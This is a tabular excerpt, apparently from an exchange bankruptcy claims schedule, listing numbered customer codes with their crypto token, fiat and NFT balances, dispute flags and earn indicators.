| 07366137 | | BTC[0], DOGE[1.91557428], ETH[0], LINK[0], SOL[0], USD[0.00] | | |
| 07366139 | | BTC[0], DOGE[1], ETH[.0000024], ETHW[.0000024], USD[0.01], USDT[0] | Yes | |
| 07366140 | | TRX[5294.49051020], USD[0.00] | | |
| 07366141 | | USD[10.00] | | |
| 07366144 | | USD[10.00] | | |
| 07366145 | | USD[10.00] | | |
| 07366147 | | ETHW[5.15805926], USD[10.36] | Yes | |
| 07366149 | | ETH[0], USD[0.85] | | |
| 07366150 | | USD[10.00] | | |
| 07366151 | | USD[11.06] | Yes | |
| 07366153 | | USD[12.12] | | |
| 07366154 | | CUSDT[2], DOGE[83.2566824], TRX[2], USD[0.00] | Yes | |
| 07366157 | | USD[10.00] | | |
| 07366158 | | USD[10.00] | | |
| 07366161 | | BAT[7.91781257], CUSDT[1], DOGE[56.4512925], USD[0.00] | | |
| 07366162 | | CUSDT[3], DOGE[369.20438143], TRX[3], USD[0.00], USDT[.00008393] | Yes | |
| 07366163 | | USD[0.00] | | |
| 07366164 | | USD[10.00] | | |
| 07366165 | | CUSDT[2], GRT[1], SHIB[2], TRX[2], USD[0.00] | | |
| 07366166 | | DOGE[135.82196192], USD[0.00] | | |
| 07366167 | | BTC[0], DOGE[1.00000769], USD[0.77] | | |
| 07366168 | | USD[10.00] | | |
| 07366169 | | BRZ[1], BTC[.00302905], CUSDT[1], DOGE[734.71485734], USD[10.00] | | |
| 07366170 | | BRZ[2], CUSDT[4], DOGE[3966.46421681], GRT[1], TRX[1], USD[0.00] | | |
| 07366171 | | USD[10.00] | | |
| 07366172 | | USD[10.00] | | |
| 07366173 | | CUSDT[5], DOGE[656.53511703], USD[0.00] | | |
| 07366174 | | CUSDT[1], DOGE[3], TRX[1], USD[0.00] | | |
| 07366175 | | BTC[.00042288], CUSDT[2], DOGE[245.32794919], ETH[0.00565885], ETHW[0.00559045], USD[-10.00] | Yes | |
| 07366176 | | BCH[0], BRZ[0], LINK[0], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07366177 | Contingent, Disputed | BRZ[1], CUSDT[2], TRX[1], USD[87.15] | Yes | |
| 07366178 | | BTC[0], USD[13.56] | | |
| 07366180 | | DOGE[2.68494597], USD[0.00] | Yes | |
| 07366181 | | CUSDT[236.28446801], DOGE[1716.4782753], TRX[37.62738167], USD[0.74] | | |
| 07366182 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366183 | | BTC[.00021064], USD[0.00] | | |
| 07366184 | | CUSDT[1], DOGE[0], LINK[0], SHIB[345926.94017571], USD[0.01] | Yes | |
| 07366185 | | USD[0.00] | | |
| 07366186 | | DOGE[0], USD[0.00] | | |
| 07366187 | | USD[10.00] | | |
| 07366189 | | USD[10.00] | | |
| 07366190 | | USD[10.00] | | |
| 07366191 | | BRZ[1], CUSDT[1], DOGE[1.54482794], ETH[.01856391], ETHW[.01856391], USD[0.39], USDT[1] | | |
| 07366192 | | BAT[1.01655549], CUSDT[1], DOGE[2], ETH[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07366193 | | USD[10.00] | | |
| 07366194 | | AAVE[0], BTC[0.00000001], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], NFT (306970112506856347/Entrance Voucher #3704)[1], SOL[0], SUSHI[0], USD[0.00], USDT[-0.00314338] | | |
| 07366195 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07366197 | | USD[10.00] | | |
| 07366198 | | AVAX[.55110294], BAT[1.01395057], BRZ[4], CUSDT[11], DOGE[2], ETH[4.58094772], ETHW[4.57902374], GRT[2.0604886], SHIB[1], SOL[5.72517576], TRX[6], USD[0.00], USDT[2.18359131] | Yes | |
| 07366200 | | CUSDT[4], TRX[186.21347373], USD[0.00] | Yes | |
| 07366201 | | CUSDT[7], DOGE[2077.59713378], ETH[.01533383], ETHW[.01533383], LINK[2.01378927], NFT (442050468619177802/Entrance Voucher #2290)[1], USD[0.00] | | |
| 07366203 | | USD[10.00] | | |
| 07366205 | | BAT[1], CUSDT[3], DOGE[.0070881], ETH[.00266399], ETHW[.00266399], GRT[1], TRX[2], USD[0.01] | | |
| 07366206 | | BTC[.00002637], ETH[.00060086], ETHW[.00060086], USD[10.00] | | |
| 07366208 | | CUSDT[4], TRX[3], USD[0.62] | | |
| 07366209 | | TRX[1], USD[0.01] | | |
| 07366210 | | USD[10.00] | | |
| 07366211 | | NEAR[.01] | | |
| 07366212 | | TRX[.00003898], USD[0.00] | | |
| 07366213 | | USD[10.00] | | |
| 07366214 | | USD[10.00] | | |
| 07366215 | | CUSDT[4], DOGE[107.12688261], TRX[1], USD[0.00] | | |
| 07366216 | | DOGE[52.75885273], USD[10.00] | | |
| 07366217 | | USD[10.00] | | |
| 07366218 | | DOGE[22.73163579], TRX[1], USD[0.00] | Yes | |
| 07366219 | | USD[10.00] | | |
| 07366220 | | USD[10.00] | | |
| 07366221 | | DOGE[0], ETH[0], ETHW[1.30445533], LINK[3], MATIC[103], USD[62.47] | Yes | |
| 07366222 | | USD[10.00] | | |
| 07366223 | | CUSDT[1], GRT[0], TRX[256.18611050], USD[0.00] | Yes | |
| 07366224 | | CUSDT[5], USD[0.00] | | |
| 07366225 | | USD[10.99] | Yes | |
| 07366226 | | DOGE[.00049488], USD[0.01] | | |
| 07366227 | | USD[10.00] | | |
| 07366228 | | USD[10.00] | | |
| 07366230 | | USD[10.00] | | |
| 07366232 | | USD[10.00] | | |
| 07366233 | | BTC[.00021154], USD[0.00] | | |
| 07366234 | | GRT[52.66570471], USD[0.00] | | |
| 07366235 | | CUSDT[1], USD[0.00] | Yes | |
| 07366238 | | USD[11.09] | Yes | |
| 07366239 | | USD[0.00] | | |
| 07366240 | | USD[10.00] | | |
| 07366241 | | USD[10.00] | | |
| 07366242 | | DOGE[2628.998645], USD[10.00] | | |
| 07366244 | | BAT[0], BRZ[1], BTC[0], CUSDT[12], DOGE[1276.14238612], LINK[0], LTC[0], SHIB[0], USD[0.00] | | |
| 07366245 | | GRT[5.69804683], USD[0.00] | | |
| 07366246 | | CUSDT[2], USD[0.00] | | |
| 07366247 | | BRZ[40.34322401], CUSDT[4], DOGE[85.37439534], USD[0.92] | | |
| 07366248 | | USD[10.00] | | |
| 07366249 | | BAT[.00004818], BRZ[8], CUSDT[11], DOGE[.2114164], GRT[4], SHIB[72139322.68328716], SOL[9.19666933], TRX[.00007386], USD[0.01], USDT[3] | | |
| 07366251 | | CUSDT[2], USD[0.00] | | |
| 07366252 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366253 | | USD[10.00] | | |
| 07366254 | | BRZ[1], DOGE[1], USD[0.75] | | |
| 07366255 | | CUSDT[1], USD[0.00] | | |
| 07366256 | | BTC[.00022747], USD[0.00] | | |
| 07366257 | | BRZ[1], CUSDT[2], TRX[1.03951218], USD[0.00] | Yes | |
| 07366258 | | CUSDT[4], DOGE[1], MATIC[6.3183222], NFT (552608793307612149/Scoogi #220)[1], NFT (555452501381960346/Scoogi #6759)[1], NFT (564374698800748409/Scoogi #5547)[1], SOL[1.69585459], TRX[1], USD[0.00] | Yes | |
| 07366259 | | USD[10.00] | | |
| 07366260 | | BAT[1], BRZ[1], CUSDT[8], SHIB[0], TRX[2], USD[0.01] | | |
| 07366261 | | BTC[.00122036], DOGE[1], USD[10.00] | | |
| 07366262 | | CUSDT[2], DOGE[27.40293175], USD[0.00] | | |
| 07366263 | | BAT[0], BRZ[0], DOGE[0], LTC[0], USD[0.00], USDT[0] | | |
| 07366264 | | USD[10.00] | | |
| 07366265 | | USD[10.00] | | |
| 07366268 | | DOGE[.00000284], TRX[1], USD[399.56] | | |
| 07366269 | | USD[10.00] | | |
| 07366270 | | DOGE[2.00002678], TRX[4], USD[65.58] | | |
| 07366272 | | CUSDT[1], DOGE[196.59672868], USD[0.00] | | |
| 07366273 | | USD[10.00] | | |
| 07366276 | | BTC[0], SHIB[2], SOL[.00019001], TRX[2], UNI[0.00002609], USD[56.56] | | |
| 07366277 | | USD[10.00] | | |
| 07366278 | | BAT[1], CUSDT[4], USD[59.36] | | |
| 07366279 | | BRZ[2], CUSDT[2], DOGE[225.48654159], TRX[1], USD[0.34] | | |
| 07366280 | | USD[10.00] | | |
| 07366281 | | CUSDT[2], DOGE[.04446766], USD[0.00] | Yes | |
| 07366282 | | BAT[1], DOGE[0], GRT[0], USD[0.00] | | |
| 07366283 | | LINK[.34460869], USD[0.00] | | |
| 07366284 | | DOGE[1], ETH[.00473748], ETHW[.00473748], USD[0.00] | | |
| 07366285 | | CUSDT[4], USD[0.00] | | |
| 07366286 | | AAVE[.00000001], BAT[1.0165555], CUSDT[1], DOGE[277.16004616], ETH[.71538817], ETHW[.71508126], LINK[18.07897613], MATIC[300.69928224], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07366287 | | UNI[.48073939], USD[0.00] | | |
| 07366288 | | USD[10.00] | | |
| 07366289 | | USD[10.00] | | |
| 07366290 | | USD[10.00] | | |
| 07366291 | | DOGE[5546.03120398], SHIB[4204835.28560028], USD[0.00] | Yes | |
| 07366292 | | USD[0.00] | | |
| 07366293 | | USD[10.00] | | |
| 07366294 | | USD[2.27] | | |
| 07366295 | | DOGE[.00046911], TRX[.01952308], USD[0.00] | | |
| 07366296 | | BRZ[2], CUSDT[21], DOGE[4], KSHIB[.00002048], SHIB[14], TRX[6], USD[1.33] | Yes | |
| 07366298 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07366299 | | USD[10.00] | | |
| 07366300 | | ETH[.00566541], ETHW[.00566541], TRX[1], USD[0.00] | | |
| 07366302 | | BRZ[1], DOGE[1063.79329903], SUSHI[1.00012606], TRX[372.35452864], USD[0.00] | | |
| 07366303 | | CUSDT[2], DOGE[.45476669], TRX[2], USD[0.01] | | |
| 07366304 | | CUSDT[2], DOGE[.00004328], TRX[3], USD[0.01] | | |
| 07366305 | | DOGE[3316.27353177], TRX[1], USD[10.00] | | |
| 07366306 | | USD[10.00] | | |
| 07366307 | | BAT[1], CUSDT[2], DOGE[271.83637318], USD[0.19] | | |
| 07366308 | | BRZ[1], CUSDT[7], DOGE[24.28214234], TRX[5], USD[0.00], USDT[1] | | |
| 07366309 | | BRZ[1], DOGE[74.86035685], ETH[.02612034], ETHW[.02612034], TRX[2], USD[0.00] | | |
| 07366310 | | CUSDT[1], GRT[8.97526589], TRX[1], USD[0.00], USDT[1] | | |
| 07366311 | | USD[10.00] | | |
| 07366312 | | USD[10.00] | | |
| 07366314 | | USD[10.00] | | |
| 07366316 | | ETH[0], ETHW[0], SOL[0], USD[0.01], USDT[0] | | |
| 07366317 | | BAT[1], CUSDT[1], TRX[0], USD[0.00], USDT[0] | | |
| 07366318 | | USD[10.00] | | |
| 07366320 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366322 | | BTC[0.00000589], USD[0.00] | Yes | |
| 07366323 | | USD[10.00] | | |
| 07366324 | | BRZ[0.0281413], BTC[0.20045540], CUSDT[16], DOGE[21517.43563249], ETH[0], GRT[1], SHIB[13], SOL[17.28963061], TRX[4426.56577582], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07366325 | | USD[10.00] | | |
| 07366326 | | USD[10.00] | | |
| 07366328 | | BRZ[1], CUSDT[3], DOGE[1143.58659617], USD[4.33] | | |
| 07366329 | | USD[10.00] | | |
| 07366330 | | USD[10.00] | | |
| 07366331 | | CUSDT[4], TRX[4], USD[0.82] | | |
| 07366332 | | USD[10.00] | | |
| 07366333 | | BAT[.0034858], BCH[.05610458], BRZ[1], BTC[.00090648], CAD[26.89], CUSDT[504.27936251], DAI[10.82782824], DOGE[48.11401858], ETH[.00340579], ETHW[.00336475], EUR[22.06], LTC[.06192084], MKR[.00114871], PAXG[.00607279], SOL[1.30928609], TRX[55.68572187], UNI[.40120483], USD[0.00], YFI[.00033144] | Yes | |
| 07366334 | | USD[10.00] | | |
| 07366336 | | ETH[0], USD[0.00] | Yes | |
| 07366337 | | USD[10.00] | | |
| 07366339 | | DOGE[.20767859], USD[0.00] | | |
| 07366340 | | USD[0.01] | | |
| 07366342 | | USD[10.00] | | |
| 07366343 | | CUSDT[1], DOGE[.02451707], GRT[1.00220333], USD[0.00] | Yes | |
| 07366344 | | USD[10.00] | | |
| 07366345 | | BRZ[0], DOGE[.00004457], USD[0.00] | | |
| 07366347 | | BF_POINT[300], MATIC[0], NFT (31586491440522140/FTX - Off The Grid Miami #97)[1], NFT (576216854034773522/Bahrain Ticket Stub #580)[1], SOL[0], USD[0.00] | Yes | |
| 07366349 | | USD[10.00] | | |
| 07366350 | | BTC[.00000079], USD[0.00] | | |
| 07366351 | | DOGE[502.99999036], ETH[.16565875], ETHW[.16565875], SHIB[137287.2048325], USD[17.22] | | |
| 07366352 | | CUSDT[1], USD[0.00] | | |
| 07366353 | | CUSDT[17], DOGE[592.2577175], TRX[2], USD[0.00] | | |
| 07366354 | | BRZ[2], CUSDT[4], DOGE[2], GRT[1], TRX[4], USD[0.00], USDT[2] | | |
| 07366355 | | BTC[0], CUSDT[1], DOGE[4.00000591], ETH[0], TRX[153.13547644], USD[0.00], USDT[0.46061513] | | |
| 07366356 | | USD[0.01], USDT[0] | | |
| 07366357 | | USD[1.78] | | |
| 07366358 | | DOGE[1975.82985462], LINK[10.46771779], SUSHI[5.90934967], TRX[203.00094638], USD[0.00] | Yes | |
| 07366359 | | BF_POINT[300], BRZ[1], BTC[.15712409], CUSDT[12], DOGE[4], GRT[1], MATIC[618.0579681], SHIB[8], SOL[34.65462119], TRX[6], USD[137.27], USDT[1.08511842] | Yes | |
| 07366360 | | DOGE[.1251445], TRX[1], USD[0.00] | | |
| 07366361 | | BAT[0], BF_POINT[200], BTC[0], ETH[0], GRT[0], NFT (508501631869880197/Imola Ticket Stub #1586)[1], SOL[0.00543025], USD[0.00], USDT[0] | Yes | |
| 07366362 | | BAT[0], GRT[0], USD[0.00] | | |
| 07366365 | | DOGE[1], TRX[1], USD[61.26] | | |
| 07366366 | | NFT (419092028333889999/ApexDucks #860)[1], NFT (469275582803614768/ApexDucks #3165)[1], SOL[.01916347], USD[0.00] | Yes | |
| 07366367 | | CUSDT[1], USD[0.00] | | |
| 07366369 | | DOGE[34.08516341], USD[0.00] | | |
| 07366370 | | CUSDT[8], DOGE[1], ETH[.56836205], ETHW[.56812331], GRT[1.00498957], SOL[5.84546176], TRX[0], USD[0.00] | Yes | |
| 07366371 | | USD[10.00] | | |
| 07366373 | | USD[10.00] | | |
| 07366374 | | BTC[0], CUSDT[10], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], SHIB[1636111.63656708], SOL[0], SUSHI[0], TRX[3], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07366377 | | BRZ[2], DOGE[452.95277741], ETH[.66738859], ETHW[.66738859], TRX[2], USD[0.26] | | |
| 07366378 | | USD[10.00] | | |
| 07366379 | | BTC[.00021394], USD[0.00] | | |
| 07366381 | | USD[10.00] | | |
| 07366382 | | DOGE[1], LINK[4.18215977], USD[0.00] | | |
| 07366383 | | BRZ[12], CUSDT[24], DOGE[340.2897451], GRT[1128.51556968], KSHIB[7609.52426319], SHIB[1], SUSHI[9.11868407], TRX[8], USD[0.00], USDT[5] | | |
| 07366384 | | BRZ[1], CUSDT[1], DOGE[.11334161], LINK[.00056614], MATIC[.033662], SOL[.00000001], TRX[1], USD[0.01] | Yes | |
| 07366385 | | USD[10.00] | | |
| 07366388 | | TRX[185.37222681], USD[0.00] | | |
| 07366389 | | CUSDT[3], USD[0.01] | | |
| 07366390 | | CUSDT[2], USD[0.01], USDT[0] | | |
| 07366391 | | USD[10.00] | | |
| 07366392 | | BRZ[3], BTC[.01105141], CUSDT[3], TRX[2], USD[0.00] | Yes | |
| 07366395 | | DOGE[1], GRT[1], USD[0.00] | | |
| 07366396 | | DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366397 | | USD[0.00] | | |
| 07366398 | | USD[10.00] | | |
| 07366399 | | BRZ[1], CUSDT[11], TRX[7], USD[0.00], USDT[0.00008366] | | |
| 07366401 | | DOGE[1], ETH[.02136814], ETHW[.02136814], TRX[1], USD[0.00] | | |
| 07366402 | | BTC[0], CUSDT[1], DOGE[3], TRX[3], USD[10.00], USDT[0.00001588] | | |
| 07366403 | | BRZ[3], CUSDT[6], ETH[.06249559], ETHW[.0617185], TRX[1], USD[0.00] | Yes | |
| 07366404 | | NFT (433630609896798342/FTX - Off The Grid Miami #2299)[1], USD[11.09] | Yes | |
| 07366405 | | CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07366406 | | BRZ[2], CUSDT[941.78394577], DOGE[1043.98959749], PAXG[.02748289], TRX[406.38511126], USD[0.23] | | |
| 07366407 | | USD[10.00] | | |
| 07366408 | | CUSDT[1], DOGE[0.00089544], TRX[106.86753432], USD[0.00] | | |
| 07366409 | | USD[10.00] | | |
| 07366410 | | BRZ[1], DOGE[74.26399686], USD[0.00] | | |
| 07366412 | | DOGE[2], SHIB[37672.6106368], SOL[.00000075], TRX[1], USD[0.00], USDT[0] | | |
| 07366414 | | DOGE[6111.93808731], TRX[1], USD[0.00] | Yes | |
| 07366415 | | BRZ[3], CUSDT[1], DOGE[2], TRX[1], USD[0.00], USDT[1] | | |
| 07366416 | | CUSDT[57.77624362], DOGE[927.66821656], SGD[83.70, SHIB[1272953.75724517], SOL[1.44808751], TRX[1], UNI[2.13460734], USD[2273.65], USDT[3.28407907], ZAR[354.07] | Yes | |
| 07366417 | | USD[10.00] | | |
| 07366418 | | USD[10.00] | | |
| 07366419 | | DOGE[170.34126851], USD[0.00] | | |
| 07366420 | | USD[10.00] | | |
| 07366421 | | USD[10.89] | Yes | |
| 07366422 | | USD[10.00] | | |
| 07366423 | | USD[10.00] | | |
| 07366425 | | BTC[0.00006270], GRT[.65460751], LTC[.0038816], SOL[.000795], SUSHI[.353275], UNI[.00517], USD[36.94] | | |
| 07366426 | | BRZ[1], USD[0.53] | | |
| 07366427 | | USD[10.00] | | |
| 07366428 | | BRZ[1], DOGE[1], GRT[1.00498931], SHIB[105020578.14540307], USD[1209.02] | Yes | |
| 07366429 | Contingent, Disputed | BAT[1289.58771018], BRZ[93012358], CUSDT[57795.34942323], DOGE[.30634093], GRT[390.13816795], LINK[.05574571], TRX[.05590085], USD[-303.80] | Yes | |
| 07366430 | | BRZ[1], BTC[.00000003], CUSDT[4], DOGE[1], NFT (552100547956184409/Fancy Frenchies #1838)[1], SOL[.00000001], USD[0.00] | Yes | |
| 07366431 | | USD[10.00] | | |
| 07366432 | | BTC[.00020278], USD[0.00] | | |
| 07366433 | | USD[10.00] | | |
| 07366435 | | USD[10.00] | | |
| 07366436 | | CUSDT[2], DOGE[1], USD[0.82] | | |
| 07366438 | | BAT[1.0165555], BRZ[2], CUSDT[2], DOGE[3117.90881918], GRT[2.07183501], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07366439 | | USD[0.01], USDT[0] | Yes | |
| 07366440 | | USD[10.00] | | |
| 07366441 | | GRT[.00015651], USD[0.00], YFI[.00000019] | | |
| 07366443 | | DOGE[1], GRT[1], USD[0.00] | | |
| 07366444 | | DOGE[153.89916618], USD[0.00] | | |
| 07366446 | | TRX[1], USD[0.00] | | |
| 07366447 | | AAVE[.71366], BTC[.00102086], LINK[52.5174], SOL[.003], SUSHI[14.9655], USD[11.35] | | |
| 07366448 | | DOGE[2481.45670264], ETHW[2.77680239], USD[301.89], USDT[0.05098588] | | |
| 07366449 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07366450 | | BAT[4.34463766], BRZ[2], CUSDT[.19496612], DOGE[1], GRT[3.10801], LINK[2.17233871], SHIB[35.78816627], SOL[.00001847], TRX[9.00087675], USD[0.00], USDT[2.17233871] | Yes | |
| 07366452 | | BAT[1.01655549], CUSDT[1], ETH[.0000476], ETHW[.0000476], TRX[3], USD[0.00] | Yes | |
| 07366453 | | CUSDT[1], SOL[.0037125], TRX[1], USD[0.01] | | |
| 07366454 | | DOGE[142.13546021], USD[0.00] | | |
| 07366455 | | ALGO[.0005088], DOGE[254.54625838], ETH[.01135174], ETHW[.00000014], SHIB[1455152.58225393], SOL[.00000562], USD[0.00] | Yes | |
| 07366456 | | USD[0.00] | | |
| 07366457 | | USD[0.00] | | |
| 07366458 | | USD[0.00], YFI[.00001838] | | |
| 07366459 | | USD[10.00] | | |
| 07366460 | | USD[10.00] | | |
| 07366461 | | CUSDT[3], DOGE[294.54004708], LINK[0], USD[0.00] | | |
| 07366462 | | USD[10.00] | | |
| 07366463 | | SUSHI[0], TRX[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366464 | | BTC[0], DOGE[2], ETH[0], LTC[0], PAXG[0], SHIB[.00000001], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07366465 | | USD[10.00] | | |
| 07366466 | | BRZ[1], DOGE[0], ETH[0], ETHW[0], LTC[0], MATIC[0], SOL[0], TRX[0], USD[0.00], USDT[0.00000214] | Yes | |
| 07366468 | | CUSDT[3], DOGE[107.62427836], USD[0.00] | | |
| 07366469 | | BTC[0], DOGE[0], ETH[.00000001], TRX[0], USD[0.00] | | |
| 07366470 | | USD[0.00] | Yes | |
| 07366472 | | USD[10.00] | | |
| 07366473 | | ETH[.08941592], ETHW[.08941592], USD[0.00], USDT[0] | | |
| 07366475 | | CUSDT[1], DOGE[518.74874689], USD[10.00] | | |
| 07366476 | | USD[10.00] | | |
| 07366477 | | USD[10.00] | | |
| 07366480 | | USD[10.00] | | |
| 07366481 | | DOGE[.00330392], TRX[1], USD[0.01] | | |
| 07366482 | | BRZ[2], DOGE[2], CUSDT[10], DOGE[2], ETH[0], GRT[2.07105953], LINK[0], LTC[0], SOL[0], TRX[8.00087675], USD[0.00], USDT[0] | Yes | |
| 07366484 | | CUSDT[2], DOGE[5527.6423935], UNI[2.08974455], USD[0.00] | | |
| 07366485 | | DOGE[1882.9], ETH[.083996], ETHW[.083996], MATIC[9.99], SUSHI[.382], USD[0.07] | | |
| 07366486 | | BRZ[2], CUSDT[14], DOGE[.42432582], GRT[1.00176413], LINK[1.08385072], SHIB[15712762.21302245], SOL[10.17710667], TRX[8816.54682566], UNI[1.08385072], USD[2050.95], USDT[3.23893674] | Yes | |
| 07366487 | | CUSDT[1], DOGE[322.55835159], ETH[.03201432], ETHW[.0316176], USD[0.00] | Yes | |
| 07366488 | | BAT[0], BRZ[1], CUSDT[1], ETH[0], USD[0.00] | | |
| 07366489 | | USD[10.00] | | |
| 07366490 | | USD[10.00] | | |
| 07366491 | | CUSDT[2], TRX[1], USD[132.28] | | |
| 07366493 | | USD[11.09] | Yes | |
| 07366494 | | USD[10.00] | | |
| 07366496 | | USD[10.00] | | |
| 07366497 | | BTC[0], SOL[.00947], USD[0.40] | | |
| 07366498 | | USD[10.00] | | |
| 07366499 | | SUSHI[.67872373], USD[0.00] | | |
| 07366500 | | BRZ[3], CUSDT[4], DOGE[0], TRX[2], USD[0.71] | | |
| 07366501 | | USD[10.00] | | |
| 07366503 | | BAT[366.15817589], BRZ[0], BTC[0], CAD[0.00], CUSDT[233.62448103], DOGE[3], GRT[3], KSHIB[7.01044275], LTC[3.4375199], MATIC[2.03789328], SHIB[1], SOL[413.76697641], SUSHI[2.04110913], TRX[3684.44930461], UNI[2.65109679], USD[0.00], USDT[2.10414535] | Yes | |
| 07366506 | | DOGE[466.55534477], SHIB[4722966.68625717], TRX[397.4099298], USD[488.36] | Yes | |
| 07366507 | | USD[10.00] | | |
| 07366508 | | DOGE[18.07827469], USD[0.00] | | |
| 07366510 | | BRZ[1], BTC[.00057089], CUSDT[3], DOGE[2600.96784176], USD[0.00] | | |
| 07366511 | | BAT[.00683479], BRZ[4], BTC[.00000085], CUSDT[14], ETH[.00001658], ETHW[.00001659], GRT[2.05367892], SUSHI[.61163847], TRX[63.82199746], UNI[5.93413233], USD[0.00], USDT[35.83649549] | Yes | |
| 07366512 | | USD[10.00] | | |
| 07366513 | | USD[0.00] | | |
| 07366515 | | BAT[0], CUSDT[2], DOGE[41.84055575], TRX[0], USD[12.93] | | |
| 07366516 | | SOL[1.13842872], USD[0.00] | | |
| 07366517 | | CUSDT[1], GRT[3.79343076], TRX[1], USD[0.00] | | |
| 07366518 | | DOGE[1], TRX[3], USD[0.01] | | |
| 07366519 | | DOGE[90.19699384], LTC[.02089116], USD[0.00] | | |
| 07366520 | | USD[10.00] | | |
| 07366521 | | BAT[1], BTC[0], CUSDT[1], DOGE[1], SOL[0], TRX[3], USD[0.00], USDT[1] | | |
| 07366522 | | DOGE[2], DOGE[.00004486], TRX[1], USD[412.12] | | |
| 07366523 | | USD[10.00] | | |
| 07366524 | | CUSDT[2], USD[0.00] | | |
| 07366526 | | USD[10.00] | | |
| 07366527 | | USD[10.00] | | |
| 07366528 | | USD[10.00] | | |
| 07366530 | | USD[10.00] | | |
| 07366531 | | USD[10.00] | | |
| 07366532 | | USD[10.00] | | |
| 07366533 | | DOGE[0], SHIB[114000000], TRX[0.99150515], USD[0.43] | | |
| 07366534 | | USD[10.00] | | |
| 07366536 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366538 | | BTC[.00017848], USD[0.00] | | |
| 07366539 | | CUSDT[4], DOGE[32.1640431], USD[0.00] | | |
| 07366540 | | CUSDT[1], DOGE[1], ETH[.18947524], ETHW[.18947524], USD[0.00] | | |
| 07366541 | | SUSHI[1.992], UNI[1.3944], USD[3.27] | | |
| 07366542 | | USD[0.00] | | |
| 07366543 | | BRZ[3], CUSDT[2], DOGE[2], SHIB[1], SUSHI[1], TRX[7], USD[0.00], USDT[0] | | |
| 07366544 | | CUSDT[1], DOGE[954.6996327], TRX[4], USD[1.43] | | |
| 07366545 | | BTC[.00000034], ETH[.00000457], ETHW[.00000457], SHIB[2], SOL[.00001755], USD[0.01] | Yes | |
| 07366546 | | BAT[1.0165555], USD[0.00] | Yes | |
| 07366547 | | BTC[.00001572], TRX[.000001], USD[8253.16], USDT[0] | | |
| 07366548 | | USD[10.00] | | |
| 07366549 | | USD[10.00] | | |
| 07366550 | | CUSDT[6], USD[0.01] | | |
| 07366551 | | BTC[0], ETH[0], LINK[.00238787], LTC[.00024903], SOL[0.00007631], SUSHI[.00004104], USD[-0.43], USDT[0.47405537], WBTC[0], YFI[.00000063] | | |
| 07366552 | | BTC[.00028203] | | |
| 07366553 | | BF_POINT[100], BTC[0], ETH[0.13530952], MATIC[0], SHIB[3], SOL[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07366554 | | CUSDT[1], DOGE[133.68373405], USD[0.00] | | |
| 07366557 | | USD[10.00] | | |
| 07366558 | | USD[10.00] | | |
| 07366559 | | USD[10.73] | Yes | |
| 07366560 | | DOGE[0], ETH[0], USD[0.00], USDT[0] | Yes | |
| 07366561 | | USD[10.00] | | |
| 07366562 | | USD[0.00] | | |
| 07366563 | | BCH[1.1542288], BRZ[5.07952967], BTC[.02916876], CUSDT[14], DOGE[1], LTC[32.86668934], TRX[1], USD[-600.00], USDT[2.19800897] | Yes | |
| 07366564 | | SUSHI[.43], USD[1.41] | | |
| 07366565 | | BTC[.0077563], CUSDT[7], DOGE[162.2788866], ETH[.21458725], ETHW[.21458725], LINK[1.30299304], TRX[1], USD[0.00] | | |
| 07366567 | | CUSDT[3], USD[0.01] | | |
| 07366568 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07366569 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07366570 | | USD[0.00] | | |
| 07366571 | | DOGE[.9094], ETH[0], GRT[.8404], TRX[.85825], USD[0.00] | | |
| 07366573 | | USD[0.00] | | |
| 07366574 | | SHIB[1], USD[0.00] | | |
| 07366575 | | USD[10.00] | | |
| 07366577 | | BTC[.00000001], DOGE[1], SHIB[2075982.18000268], USD[0.00] | Yes | |
| 07366578 | | USD[10.00] | | |
| 07366579 | | USD[10.00] | | |
| 07366581 | | USD[10.00] | | |
| 07366584 | | CUSDT[1], DOGE[1.19221617], ETH[.00004732], ETHW[.00004732], GRT[1], USD[179.61] | | |
| 07366585 | | DOGE[1149.21235283], SHIB[1], USD[0.01], USDT[0] | | |
| 07366587 | | USD[10.00] | | |
| 07366588 | | USD[10.00] | | |
| 07366590 | | USD[10.00] | | |
| 07366591 | | BAT[1], DOGE[7145.36931234], SHIB[6828584.03619798], SOL[15.20299669], TRX[2], USD[0.00], USDT[0] | | |
| 07366592 | | BAT[1], DOGE[.13504672], GRT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07366593 | | BRZ[1], CUSDT[467.79825128], DAI[.00004525], DOGE[38.46575116], TRX[1.00003255], USD[1.40] | | |
| 07366594 | | BRZ[0], BTC[0], USD[0.00], USDT[0] | | |
